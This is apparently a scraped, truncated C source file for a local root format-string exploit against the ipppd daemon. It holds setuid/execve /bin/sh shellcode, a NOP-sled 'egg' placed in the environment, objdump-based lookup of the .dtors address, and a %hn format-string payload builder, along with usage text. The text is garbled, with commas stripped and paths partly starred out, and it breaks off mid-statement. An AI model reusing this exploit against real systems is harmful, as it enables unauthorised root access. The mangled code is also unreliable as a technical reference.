/ #include #include #include #include #define ADD 0x100 #define OCT( b0 b1 b2 b3 addr ) { \ b0 = (addr >> 24) & 0xff; \ b1 = (addr >> 16) & 0xff; \ b2 = (addr >> 8) & 0xff; \ b3 = (addr ) & 0xff; \ } #define DTORS "/usr/bin/objdump -s -j .dtors /usr/ *** in/ipppd | /usr/bin/cut -c 2-9 |/usr/bin/awk NR==5" #define IPPPD "/usr/ *** in/ipppd" #define OFFSET 11 #define BASE 5 #define DEF_EGGSIZE 500 #define DEF_ALIGN 4 char vitamin[300]; char DtorsAddr[36]; unsigned long get_sp(void) { __a *** __ ("movl %esp %eax"); } char nop[] = { 0x90 }; static char shellcode[] = //ptrace24.c shellcode "\x6a\x17\x58\x31\xdb\xcd\x80\x31" "\xd2\x52\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x52\x53" "\x89\xe1\x8d\x42\x0b\xcd\x80"; int i=0; char *pointer; char *nops = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; int find(){ /*Thanks to GOBBLES for the find() code*/ pointer = (char *)get_sp(); while((i = strncmp(pointer nops strlen(nops))) != 0) pointer++; if(i == 0) { pointer=pointer+1; return pointer; } else { fprintf(stderr "Sorry nimm GDB\n"); return; } } char * grepit() { //from the Mixter md5bd.c backdoor FILE *p; char fmt[1024]; snprintf(fmt 1024 DTORS); p = popen(fmt "r"); memset(DtorsAddr 0 36); fread(DtorsAddr 32 1 p); fclose(p); return DtorsAddr; } char * build_hn( unsigned int retaddr unsigned int offset unsigned int base ) { // From the fmtbuilder.c unsigned int length; unsigned int high low; char * buf; int start = ((base / (ADD*ADD)) + 1)*ADD*ADD; high = ( retaddr & 0xffff0000 ) >> 16; low = retaddr & 0x0000ffff; length = ( sizeof( offset ) * 2 ) + sizeof( high ) + sizeof( low ) + 15; if ( !(buf = (char *)malloc(length * sizeof(char))) ) { fprintf( stderr "Can't allocate buffer (%d)\n" length ); exit( -1 ); } memset( buf 0 length ); snprintf( buf length "%%.%hdx%%%d$n%%.%hdx%%%d$hn" low - ( sizeof( size_t ) * 2 ) + start - base offset high - low + start offset+1 ); return buf; } void soso(void) { printf ( "\t\t***yet another lame ipppd local root formatstring exploit***\n\n"); printf ( "**usage:\n\n exploitipppd -s start the eggshell -e !ExploRe iT! [-d .dtors section -o offset -b base]\n\n"); } void egg() { char *eggbuf *buf_ptr; int align i eggsize ; align = DEF_ALIGN; eggsize = DEF_EGGSIZE ; if ( (eggbuf = malloc( eggsize )) == NULL ) { printf ("error : malloc \n"); exit (-1); } /* set egg buf */ memset( eggbuf (int)NULL eggsize ); for ( i = 0; i < 250 ; i++ ) strcat ( eggbuf nop ); strcat ( eggbuf shellcode ); for ( i =0 ; i < align ; i++ ) strcat ( eggbuf "A"); memcpy ( eggbuf "S=" 2 ); putenv ( eggbuf ); fprintf(stderr "\nUse ./exploitipppd -e to explore ipppd now\n\n"); system("/bin/sh"); } int main( int argc char **argv[] ) { char opt; char * fmt; char * endian; unsigned long locaddr retaddr; unsigned int offset base align = 0; unsigned char b0 b1 b2 b3; int length ch; int t=0 u=0; if(argc < 2) { soso(); exit(1); } length = ( sizeof( size_t ) * 16 ) + 1; if ( !(endian = (char *)malloc(length * sizeof(char))) ) { fprintf( stderr "Can't allocate buffer (%d)\n" length ); exit( -1 ); } memset( endian 0 length ); offset = OFFS